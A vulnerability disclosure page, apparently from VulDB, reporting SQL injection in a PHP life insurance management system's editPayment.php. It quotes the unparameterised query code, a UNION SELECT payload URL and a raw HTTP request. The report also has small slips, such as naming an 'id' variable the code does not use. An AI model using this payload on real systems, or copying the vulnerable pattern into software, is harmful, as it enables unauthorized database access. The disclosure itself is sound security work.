提出 #435410: Project Worlds Life Insurance Management System v1.0 SQL Injection情報

タイトル	Project Worlds Life Insurance Management System v1.0 SQL Injection
説明	# SQL Injection vulnerability was discovered in Life Insurance Management System(editPayment.php) Official Website: https://projectworlds.in/life-insurance-management-system-in-php/ Version: 1.0 Related Code file: /lims/editPayment.php dbname=lims Payload: /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+ <hr> ```php <?php include'connection.php'; $id = ""; if($_SERVER["REQUEST_METHOD"] == "GET"){ $recipt_no = $_GET["recipt_no"]; } $sql = "SELECT recipt_no, client_id, month, amount, due, fine, agent_id from payment where recipt_no='$recipt_no'"; $result = $conn->query($sql); echo "<div>\n"; echo '<form action="updatePayment.php" method="post">'; while($row = $result->fetch_assoc()) { echo "<label for=\"fname\">RECIPT NO</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"recipt_no\" placeholder=\"Your recpit no..\" value=\"$row[recipt_no]\">"; echo "<label for=\"fname\">CLIENT ID</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"client_id\" placeholder=\"Client Id..\" value=\"$row[client_id]\">"; echo "<label for=\"fname\">MONTH</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"month\" placeholder=\"Month..\" value=\"$row[month]\">"; echo "<label for=\"fname\">AMOUNT</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"amount\" placeholder=\"Amount..\" value=\"$row[amount]\">"; echo "<label for=\"fname\">DUE</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"due\" placeholder=\"Your Due..\" value=\"$row[due]\">"; echo "<label for=\"fname\">FINE</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"fine\" placeholder=\"Fine..\" value=\"$row[fine]\">"; echo "<label for=\"fname\">AGENT ID</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"agent_id\" placeholder=\"Agent Id..\" value=\"$row[agent_id]\">"; } echo "<input type=\"submit\" value=\"UPDATE\">"; echo "</form>\n"; echo "<a href='deletePayment.php?recipt_no=".$recipt_no."'>Delete Payment</a>"; echo "</div>\n"; echo "\n"; ?> ``` The id variable is directly inserted into the SQL query without any escaping or parameterization. An attacker could inject malicious SQL code by manipulating the id field. in (line number 88-135 of ) Injection parameter: recipt_no ``` GET /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+ HTTP/1.1 Host: 192.168.1.18 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=m36in4a8ui1q6k23afkenkqivk Connection: close ``` ![image](https://github.com/user-attachments/assets/84ad2cc6-395f-4204-862b-9e58c4458b47)
ソース	⚠️ https://github.com/peteryang520/Cve-report/blob/main/SQLi-1.md
ユーザー	Hantao Yang (UID 76989)
送信	2024年11月01日 10:13 (1 年 ago)
モデレーション	2024年11月02日 19:09 (1 day later)
ステータス	承諾済み
VulDBエントリ	282903 [Project Worlds Life Insurance Management System 1.0 /editPayment.php recipt_no SQLインジェクション]
ポイント	20

◂ 前概要次 ▸